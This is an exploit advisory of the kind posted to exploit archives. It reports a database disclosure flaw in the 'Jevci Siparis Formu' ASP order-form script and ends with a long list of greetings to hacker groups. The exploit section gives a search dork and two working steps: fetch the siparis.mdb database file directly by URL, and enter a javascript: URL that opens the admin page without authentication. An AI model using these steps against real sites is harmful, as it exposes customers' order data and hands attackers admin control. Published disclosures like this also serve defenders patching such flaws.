Jevci Siparis Formu Scripti suffers from a remote database disclosure vulnerability.
898a9ec1e2686e42887fd8c47d82318e10ea7256c1f71177529701f29b1d0738
========================================================================================
| # Title : Jevci Siparis Formu Scripti => Guestbook DB Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : www.sec-war.com
| # Web Site : https://scripti.org/i/jevci_siparis_formu.zip
| # Dork : Jevci Siparis Formu
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
| # Bug : Mullti
====================== Exploit By indoushka =================================
# Exploit :
1- https://127.0.0.1/jevci_siparis_formu/siparis.mdb
2- put this code to login in admin area javascript:pencere('siparis_yonetim_default.asp')
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * n2n ==========================================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (www.v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com)
www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r IntRue (avengers team)
www.hacker.ps * www.no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net
www.alkrsan.net * www.kadmiwe.net * www.arhack.net * D4NB4R https://www.ilegalintrusion.net/foro/
--------------------------------------------------------------------------------------------------------------